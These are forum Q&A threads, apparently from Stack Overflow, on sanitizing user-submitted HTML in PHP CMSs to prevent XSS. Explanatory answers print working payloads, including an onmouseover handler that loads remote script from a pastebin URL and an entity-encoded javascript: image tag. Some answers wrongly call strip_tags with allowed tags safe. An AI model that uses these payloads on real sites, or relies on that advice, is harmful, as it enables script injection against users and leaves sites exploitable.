Use WYSIWYG Editor with PHP escape Method - php

I am building a small test CMS using PHP and MySQL.
Adding, editing, deleting and displaying content all work well, but after finishing my code I wanted to add a WYSIWYG editor to the admin back end.
My problem is that I use an escape method to make my form a bit more secure and guard against injection. As a result, when I add styled text, an image or any other HTML in the editor, it is printed on the page as raw code (which is exactly what should happen to avoid attacks).
My escape method:
function e($text) {
    return htmlspecialchars($text, ENT_QUOTES, 'UTF-8');
}
Is there any way to work around my escape method? (I think it should not be possible, because if I can do it, every attacker could.)
Or should I change my escape method to another method?

If I understand you correctly, you want to let your users put some formatting into the text they create, and for this you are adding a WYSIWYG editor. The question is how to distinguish the formatting and special characters that are allowed from those that are not. You need to clean up the text, keeping only valid, allowed formatting (HTML tags) and removing all malicious JavaScript or HTML.
This is not as easy a task as it might sound at first. I can see several approaches here.
The easiest solution is to use strip_tags and specify which tags are allowed.
But please keep in mind that strip_tags is not perfect. Let me quote the manual here.
Because strip_tags() does not actually validate the HTML, partial or
broken tags can result in the removal of more text/data than expected.
This function does not modify any attributes on the tags that you
allow using allowable_tags, including the style and onmouseover
attributes that a mischievous user may abuse when posting text that
will be shown to other users.
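To make the last point of that quote concrete, here is a small sketch (the input string is made up for illustration): the disallowed script tag is removed, but the allowed p tag keeps its onmouseover and style attributes untouched.

```php
<?php
// strip_tags() removes tags that are not allowed, but copies the allowed
// tags verbatim, attributes included.
$input  = '<p onmouseover="alert(1)" style="font-size:100pt">Hi</p><script>x</script>';
$output = strip_tags($input, '<p>');

echo $output, "\n"; // the <p ...> tag still carries onmouseover and style
```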
This is a known issue, and there are libraries that clean up HTML and JavaScript much more thoroughly.
A somewhat more complicated solution is to use a dedicated library to clean up the HTML code, for example HTML Purifier.
A quote from its documentation:
HTML Purifier will not only remove all malicious code (better known as
XSS) with a thoroughly audited, secure yet permissive whitelist, it
will also make sure your documents are standards compliant, something
only achievable with a comprehensive knowledge of W3C's
specifications.
Other libraries solve the same task. For example, you can check this article, where several libraries are compared, and choose the best one.
A completely different approach is to prevent users from writing HTML tags at all. Ask them to write some other markup instead, as is done on StackOverflow, Basecamp or GitHub. Markdown might be a good choice.
Using a simple markup language lets you completely avoid issues with broken HTML and JavaScript, because you can escape everything and build the HTML markup yourself.
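A minimal sketch of the "escape everything, then build the HTML yourself" idea. The syntax is a made-up mini-markup (**bold** and *italic*), not real Markdown, and renderMiniMarkup is a hypothetical name; a real project would use a proper Markdown library instead.

```php
<?php
// Hypothetical mini-markup, NOT a Markdown implementation:
// **text** becomes <strong>, *text* becomes <em>.
function renderMiniMarkup(string $input): string
{
    // 1. Escape everything first, so no user-supplied HTML survives.
    $html = htmlspecialchars($input, ENT_QUOTES, 'UTF-8');

    // 2. Build our own tags from the (already escaped) markup.
    $html = preg_replace('/\*\*(.+?)\*\*/s', '<strong>$1</strong>', $html);
    $html = preg_replace('/\*(.+?)\*/s', '<em>$1</em>', $html);

    // 3. Keep line breaks visible.
    return nl2br($html);
}

echo renderMiniMarkup("**Hello** <script>alert(1)</script> *world*");
```

Because the escaping happens before any tag is generated, the only HTML in the output is the HTML this function itself writes.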
The editor might look like the one I'm using to write this message :)

You can use strip_tags() to remove the unwanted tags. Read about it in the manual:
http://php.net/manual/en/function.strip-tags.php
Example 1 (Based on the manual)
<?php
$text = '<p>Test paragraph, With link.</p>';
# Output: Test paragraph, With link. (Tags are stripped)
echo strip_tags($text);
echo "\n";
# Allow <p> and <a>
#Output: <p>Test paragraph, With link.</p>
echo strip_tags($text, '<p><a>');
?>
I hope this will help you!

Related

CKEditor remove tags server side

We use CKEditor for admins to write articles, but also for front-end editors. Because CKEditor runs only in the browser (JavaScript), we want to add some server-side tag stripping to make sure no bad tags are left behind.
The PHP function strip_tags() makes it possible to allow some tags, but we would prefer a blacklist. It also didn't look very effective.
Do you know a good way?
Thanks
EDIT: The solution given by @ErwinMoller deletes the tags but not the content within them.
There's no easy and safe way of allowing some (safe) HTML in PHP. It's simple to strip all HTML, but once you want to start allowing some HTML you run into all kinds of security issues.
Using a library such as HTML Purifier is the best way to go, and it gives you the ability to whitelist or blacklist tags and attributes at the same time as it prevents malicious code.
One thing you can do is use strip_tags().
Also try applying CSS justification to the <p> tag; it will help your view.
Or you can use FILTER_SANITIZE_STRING to filter tags out of a string (note that this filter is deprecated as of PHP 8.1).
Please check the code below.
$string = filter_var($string, FILTER_SANITIZE_STRING);

Strip tags except specific <span>-s

I'm a little stuck here. I don't know which approach is best and the most secure. I'm working with a REST API and Handlebars.js.
Context: I have user-generated content that could look like this:
<span class="user-link" data-id="12345" user-id="67890">
Name
</span>
Blablabla my comment
<script>
alert("malicious");
</script>
blabla
<b>bold</b>
<span onclick='window.location("http://maliciouswebsite");'>
bla
</span>
Goal: When doing a POST to the API, I want to strip (or encode?) all HTML tags except the <span class="user-link">[...]</span> one, because I want to render that one as real HTML in the comment list. Anything else should be HTML-encoded and shown as text. In case of any malicious insertion, I would also like to remove any kind of event handler (like onclick on the span tag) and keep only my data-id and user-id attributes.
Question: What should my approach be here? I'm fully aware that regexes on HTML are strongly discouraged. Should I turn the <span class="user-link">[...]</span> into BBCode? Or should I stick with a simple regex? Should I go with JS or PHP? How should I go about rendering the text safely?
Thank you so much for your time! Any tip or link would help immensely.
My suggestions are:
you could restrict the allowed input on the client side
instead of allowing HTML to be sent, restrict the input and allow less: BBCode or Markdown
Handlebars.SafeString() - ref. https://stackoverflow.com/a/21471546/1163786
apply input validation on the server side
apply input validation and filtering on the server side
see below: strip_tags, filtering by whitelist, blacklist
never forget that only Chuck Norris can parse HTML with regex.
The main topic is "Input Filtering and Validation" of incoming user input.
You have asked about a "best practice", or "how to proceed on this problem".
It's described here:
http://phpsecurity.readthedocs.org/en/latest/Input-Validation.html
https://phpbestpractices.org/#sanitizing-html
For many web apps, simply escaping HTML isn't enough. You probably
want to entirely remove any HTML, or allow a small subset of HTML
through. To do this, use the HTML Purifier library.
But it is extremely slow for complex HTML. Consider setting up a caching solution to store the sanitized result for later use.
You'll find a code example for working with HTML Purifier by following the last link. The purifier uses an HTML tag whitelist/blacklist approach. It's slow because filtering is a complex task.
There are other tools out there: http://htmlpurifier.org/comparison
When you restrict the allowed input to markdown, then you could use a markdown parser to prepare the output. This will still parse the whole input, but is faster than applying whitelist/blacklist purification.
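To illustrate the "restrict the input and allow less" suggestion for this specific case, here is a minimal sketch that replaces the raw span with a BBCode-style tag. The [user=USER_ID:DATA_ID]Name[/user] syntax and the renderComment name are hypothetical choices for this example: all input is HTML-encoded first, and only the strictly shaped tag is turned back into the user-link span.

```php
<?php
// Hypothetical BBCode-style syntax: [user=USER_ID:DATA_ID]Name[/user]
// e.g. [user=67890:12345]Name[/user]. Tag name and format are assumptions.
function renderComment(string $raw): string
{
    // 1. Encode ALL user input, so <script>, <b> and onclick=... become text.
    $safe = htmlspecialchars($raw, ENT_QUOTES, 'UTF-8');

    // 2. Turn only our own tag into HTML. Both IDs must be digits, so nothing
    //    else can be smuggled into the attributes; the name is already escaped.
    return preg_replace(
        '~\[user=(\d+):(\d+)\](.*?)\[/user\]~s',
        '<span class="user-link" data-id="$2" user-id="$1">$3</span>',
        $safe
    );
}

echo renderComment('[user=67890:12345]Name[/user] Blablabla <script>alert("x")</script>');
```

The regex here only runs on already-escaped text and only matches digits in the attribute positions, which sidesteps the usual problems of parsing arbitrary HTML with regexes.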

PHP "strip_tags" accept all except script

I am creating a page preview before publishing or saving a page. I noticed that I had forgotten to add <h1>, <h2>, <h3>, etc. to the list of allowed tags, so I added them later.
I want to allow ALL HTML tags except the <script> tag, and so far I came up with this list:
class HTML5Custom {
    public static function tags() {
        return '<p><a><hr><br><table><thead><tbody><tr><td><th><tfoot><span><div><ul><ol><li><img>' .
            '<canvas><video><object><embed><audio><frame><iframe><label><option><select>' .
            '<input><textarea><button><form><param><pre><code><small><em><b><u><i><strong><article>' .
            '<aside><bdi><details><summary><figure><figcaption><footer><header><hgroup><mark><meter>' .
            '<nav><progress><ruby><rt><rp><section><time><wbr><track><source><datalist><output><keygen>' .
            '<h1><h2><h3><h4><h5><h6>';
    }
}
So I use this static method like this:
$model->content = strip_tags($_POST['contents'], HTML5Custom::tags());
Have I missed any of the tags there?
I was mostly focusing on AVAILABLE tags in HTML5 specification, and all HTML4 (and lower) tags which are deprecated in HTML5 are not in the list.
Please don't use strip_tags; it is unsafe and unreliable. Read the following discussion on strip_tags for what you should use instead:
Strip_tags discussion on reddit.com
What everyone should know about strip_tags()
strip_tags is one of the common go-to functions used for making user input on web pages safe for display. But contrary to what it sounds like it's for, strip_tags is never, ever, ever the right function to use for this and it has a lot of problems. Here's why:
It can eat legitimate text. It turns "This shows that x<y." into "This shows that x", and unless it gets a closing '>' it will continue to eat the rest of the lines in the comment. (It prevents people from discussing HTML, for example.)
It doesn't prevent typed HTML entities. People can (and do) exploit that to bypass word filters & spam filters.
Using the second parameter to allow some tags is 100% dangerous. It starts out innocently: someone wants to permit simple formatting in user comments and does something like this:
$message = strip_tags($message, '<b>');
But attributes on tags aren't removed. So I could come to your site and post a comment like this:
<b style="color:red;font-size:100pt;text-decoration:blink">hello</b>
Suddenly I can use whatever formatting I want. Or I could do this:
<b style="background:url(http://someserver/transparent.gif);font-weight:normal">hello</b>
Using that I can track users browsing your site without them or you knowing.
Or if I was particularly evil, I could do something like this:
<b onmouseover="s=document.createElement('script');s.src='http://pastebin.com/raw.php?i=j1Vhq2aJ';document.getElementsByTagName('head')[0].appendChild(s)">hello</b>
Using that I could inject my own script into your site, triggered by somebody's cursor moving over my comment. Such a script would run in the user's browser with the full privileges of the page, so it is very dangerous. It could steal or delete private user data. It could alter any part of the page, such as to display fake messages or shock images. It could exploit your site's reputation to trick users into downloading malware. A single comment could even spread across the site rapidly, virally by submitting new comments from the user who views it.
You can't overstate the danger of using that second parameter. If someone cared enough, it could be leveraged to wreak total havoc.
The second parameter doesn't work decently even for known safe text. Usage like strip_tags('text in which we want line breaks<br/>but no formatting', '<br>') still strips the break because it sees the '/' as part of the tag name.
If you simply want to prevent HTML and formatting in user-submitted input, to display text on a web page exactly as typed, the correct function is htmlspecialchars. Follow that with nl2br if you want to display multiple lines, otherwise the text will appear on one line. (++Edit: You should know what character set you're using (and if you don't, aim to use UTF-8 everywhere as it's becoming a web standard). If you're using a weird not-ASCII-compatible character set, you must specify that as the second parameter to htmlspecialchars for it to work properly.)
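As a sketch of the htmlspecialchars-then-nl2br advice (the function name displayPlainText is hypothetical): escaping must come first, otherwise the <br /> tags inserted by nl2br would themselves be escaped.

```php
<?php
// Display user text exactly as typed: escape first, then convert newlines.
function displayPlainText(string $text): string
{
    return nl2br(htmlspecialchars($text, ENT_QUOTES, 'UTF-8'));
}

echo displayPlainText("This shows that x<y.\n<b>not bold</b>");
```

Unlike strip_tags, this keeps "x<y" intact and shows the b tag as literal text.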
For when you want to allow formatting, there are proper pre-designed libraries out there for allowing safe use of various syntaxes, including HTML, Markdown, BBCode, and Wikitext.
For when you want to permit formatting, you should use a proper library designed for doing this. Markdown (as used on Reddit) is a user-friendly formatting syntax, but as flyingfirefox has explained below, it allows HTML and is not safe on its own. (It is a formatter and not a sanitizer). Use of HTML and/or Markdown for formatting can be made fully safe with a sanitizer like HTML Purifier, which does what strip_tags was supposed to do. BBCode is another option.
If you feel the need to make your own formatter, even a simple one, look at existing implementations to see what they do because there are a surprising number of subtleties involved in making them reliable and safe.
The only appropriate time to use strip_tags would be to remove HTML that was supposed to be there, and now you're converting to a non-HTML format. For example, if you have some content formatted as HTML and now you want to write it to a plain text file, then using strip_tags, followed by htmlspecialchars_decode or html_entity_decode will do that. (In this case, strip_tags won't have the flaw of removing legitimate text because the text should have already been properly escaped as entities when it was made into HTML in the first place.)
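A sketch of that one legitimate use, assuming the input is HTML your own code generated (htmlToPlainText is a hypothetical name): strip the tags, then decode the entities back to characters.

```php
<?php
// Convert HTML you produced yourself into plain text (e.g. for a .txt export).
// Only safe for trusted HTML: the result must NOT be echoed back into a page.
function htmlToPlainText(string $html): string
{
    return html_entity_decode(strip_tags($html), ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

echo htmlToPlainText('<p>This shows that x&lt;y &amp; more.</p>');
```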
Generally, strip_tags is just the wrong function. Never use it. And if you do, absolutely never use the second parameter, because sooner or later someone will abuse it.
In this case it's going to be easier to blacklist as opposed to whitelist, otherwise you'll have to constantly revisit this script and update it.
Also, strip_tags() is unreliable for making HTML safe: it's still possible to inject JavaScript in attributes, e.g. onmouseover="alert('hax');", and it will get past strip_tags() just fine.
My go-to library for HTML filtering/sanitation is HTML Purifier.

people are hacking my filter

I am using a regex to block the words document|window|alert|onmouseover|onclick to prevent XSS, but people seem to be able to bypass it just by typing doc\ument. How do I fix this?
thanks!
--
edit: What about preventing XSS on the server side? Maybe refuse to serve any file that contains stuff in a GET variable?
Obviously, you would have to supply some meaningful detail to get any serious answer for your problem at hand.
As @David Dorward notes, the easiest option is to escape all HTML entities. That disables all HTML, but you don't have to deal with the plight of fighting XSS attacks.
If you need to support HTML, consider using a pre-made anti-XSS filter like HTML Purifier that promises to reliably block such attempts.
HTML Purifier is a standards-compliant HTML filter library written in PHP. HTML Purifier will not only remove all malicious code (better known as XSS) with a thoroughly audited, secure yet permissive whitelist, it will also make sure your documents are standards compliant, something only achievable with a comprehensive knowledge of W3C's specifications.
The simple option is to disallow any HTML and convert all &, < and > to their respective entities (&amp;, &lt; and &gt;).
The more complicated approach is to run the input through an HTML parser, apply a whitelist to element and attribute names, then serialise it back to HTML.
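The parse/whitelist/serialise approach can be sketched with PHP's built-in DOM extension (ext-dom). This is an illustration under stated assumptions: the tag/attribute whitelist, the http(s)-only link rule and the function names sanitizeHtml/cleanChildren are choices made for this example, and it is not a substitute for an audited library like HTML Purifier.

```php
<?php
// Whitelist sanitizer sketch built on PHP's DOM extension (ext-dom).
// The allowed tags/attributes are example assumptions, not a vetted policy.
function sanitizeHtml(string $html, array $allowed = [
    'p' => [], 'br' => [], 'b' => [], 'strong' => [], 'i' => [], 'em' => [],
    'ul' => [], 'ol' => [], 'li' => [], 'a' => ['href'],
]): string {
    if (trim($html) === '') {
        return ''; // loadHTML() rejects empty input
    }
    $doc = new DOMDocument();
    $previous = libxml_use_internal_errors(true); // no warnings for sloppy markup
    // The xml encoding prefix is a common hint to make libxml read UTF-8;
    // the wrapper div lets us find the user's fragment again after parsing.
    $doc->loadHTML('<?xml encoding="UTF-8"><div>' . $html . '</div>');
    libxml_clear_errors();
    libxml_use_internal_errors($previous);

    $root = $doc->getElementsByTagName('div')->item(0); // our wrapper comes first
    cleanChildren($root, $allowed);

    $out = '';
    foreach ($root->childNodes as $child) {
        $out .= $doc->saveHTML($child); // serialise the cleaned tree back to HTML
    }
    return $out;
}

function cleanChildren(DOMNode $node, array $allowed): void
{
    // Copy the list first, because we remove nodes while iterating.
    foreach (iterator_to_array($node->childNodes, false) as $child) {
        if ($child instanceof DOMText) {
            continue; // text is re-escaped by saveHTML()
        }
        if (!($child instanceof DOMElement)
            || !array_key_exists(strtolower($child->nodeName), $allowed)) {
            // Drop disallowed elements (with their content), comments, etc.
            $node->removeChild($child);
            continue;
        }
        $tag = strtolower($child->nodeName);
        foreach (iterator_to_array($child->attributes, false) as $attr) {
            if (!in_array(strtolower($attr->name), $allowed[$tag], true)) {
                $child->removeAttribute($attr->name); // onclick, style, ...
            }
        }
        // Only keep absolute http(s) links, so javascript: URLs are dropped.
        if ($child->hasAttribute('href')
            && !preg_match('~^https?://~i', $child->getAttribute('href'))) {
            $child->removeAttribute('href');
        }
        cleanChildren($child, $allowed);
    }
}

echo sanitizeHtml('<p onclick="evil()">Hi <b style="color:red">there</b><script>alert(1)</script></p>');
```

Everything not explicitly listed is removed, which is why a whitelist does not need updating every time someone finds a new trick.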
Is this system at all important/critical?
If so, turn it off immediately and hire a security consultant to secure it for you.
Security is a hard problem. Don't think you can get it right first time, because you won't.
If this is just a system you play around with?
Trying to stop XSS by filtering particular words is a losing battle. If you don't want HTML insertion, just HTML-encode everything. If you do want some HTML, then you need to parse the HTML, make sure it's valid and isn't going to break the page, and only then make sure it doesn't contain any elements or attributes that you don't want.
I had the same problem and only asked the question yesterday. Personally, rather than deleting tags, I created a list of all the tags I did want. The PHP function strip_tags is what I use now.
strip_tags ( string $str [, string $allowable_tags ] )
Using this command you can simply apply it to your filter like this.
text entered:
<b>Hi</b><malicious tag>
strip_tags("<b>Hi</b><malicious tag>","<b>")
This would output <b>Hi</b>.

How can I allow my user to insert HTML code, without risks? (not only technical risks)

I developed a web application that lets my users manage some aspects of a website dynamically (yes, a kind of CMS) in a LAMP environment (Debian, Apache, PHP, MySQL).
For example, they create a news item in their private area on my server, and it is then published on their website via a cURL request (or via Ajax).
The news item is created with a WYSIWYG editor (FCKeditor at the moment, probably TinyMCE in the near future).
So I can't disallow HTML tags, but how can I be safe?
Which tags MUST I delete (JavaScript?)?
That is about being server-safe, but how can I be 'legally' safe?
If a user uses my application to carry out XSS, could I get into legal trouble?
If you are using php, an excellent solution is to use HTMLPurifier. It has many options to filter out bad stuff, and as a side effect, guarantees well formed html output. I use it to view spam which can be a hostile environment.
It doesn't really matter what you're looking to remove, someone will always find a way to get around it. As a reference take a look at this XSS Cheat Sheet.
As an example, how are you ever going to remove this valid XSS attack:
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
Your best option is to allow only a subset of acceptable tags and remove everything else. This practice is known as whitelisting and is the best method for preventing XSS (besides disallowing HTML altogether).
Also use the cheat sheet in your testing; fire as much as you can at your website and try to find some ways to perform XSS.
The general best strategy here is to whitelist specific tags and attributes that you deem safe, and escape/remove everything else. For example, a sensible whitelist might be <p>, <ul>, <ol>, <li>, <strong>, <em>, <pre>, <code>, <blockquote>, <cite>. Alternatively, consider human-friendly markup like Textile or Markdown that can be easily converted into safe HTML.
Rather than allow HTML, you should have some other markup that can be converted to HTML. Trying to strip out rogue HTML from user input is nearly impossible, for example
<scr<script>ipt etc="...">
Removing <script> from this will leave
<script etc="...">
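The same effect can be reproduced in a few lines of PHP (the input string is illustrative): a single pass of str_ireplace() removes the inner tags and thereby assembles working ones.

```php
<?php
// Naive "remove the bad tag" filtering: deleting the inner <script> and
// </script> glues the surrounding fragments into a real script element.
$input    = '<scr<script>ipt>alert(1)</scr</script>ipt>';
$filtered = str_ireplace(['<script>', '</script>'], '', $input);

echo $filtered; // <script>alert(1)</script>
```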
Kohana's security helper is pretty good. From what I remember, it was taken from a different project.
However I tested out
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
From LFSR Consulting's answer, and it escaped it correctly.
For a C# example of white list approach, which stackoverflow uses, you can look at this page.
If it is too difficult removing the tags you could reject the whole html-data until the user enters a valid one.
I would reject html if it contains the following tags:
frameset, frame, iframe, script, object, embed, applet.
You also want to disallow head (and its sub-tags), body and html, because you want to provide them yourself and you do not want the user to manipulate your metadata.
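A minimal sketch of the "reject instead of clean" idea, assuming ext-dom is available (containsForbiddenTags is a hypothetical name). It leaves html, head and body out of the check because DOMDocument::loadHTML() adds those elements itself, and it only looks at element names, so attribute-based attacks such as onmouseover still get through.

```php
<?php
// Refuse the whole submission if it contains any of the listed elements.
function containsForbiddenTags(string $html): bool
{
    if (trim($html) === '') {
        return false; // nothing to check (loadHTML() rejects empty input)
    }
    $forbidden = ['frameset', 'frame', 'iframe', 'script', 'object', 'embed', 'applet'];

    $doc = new DOMDocument();
    $previous = libxml_use_internal_errors(true); // silence warnings about unknown tags
    $doc->loadHTML($html);
    libxml_clear_errors();
    libxml_use_internal_errors($previous);

    // The HTML parser lower-cases element names, so <SCRIPT> is found too.
    foreach ($forbidden as $tag) {
        if ($doc->getElementsByTagName($tag)->length > 0) {
            return true;
        }
    }
    return false;
}

var_dump(containsForbiddenTags('<p>x</p><SCRIPT>alert(1)</SCRIPT>'));
```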
But generally speaking, allowing the user to provide his own html code always imposes some security issues.
You might want to consider, rather than allowing HTML at all, implementing some standin for HTML like BBCode or Markdown.
I use PHP's strip_tags function because I want users to be able to post safely. I allow just a few tags in posts, so nobody can hack your website through script injection; I think strip_tags is the best option.
It is a very good PHP function, and you can use it like this:
$string = strip_tags($_POST['comment'], "<b>");
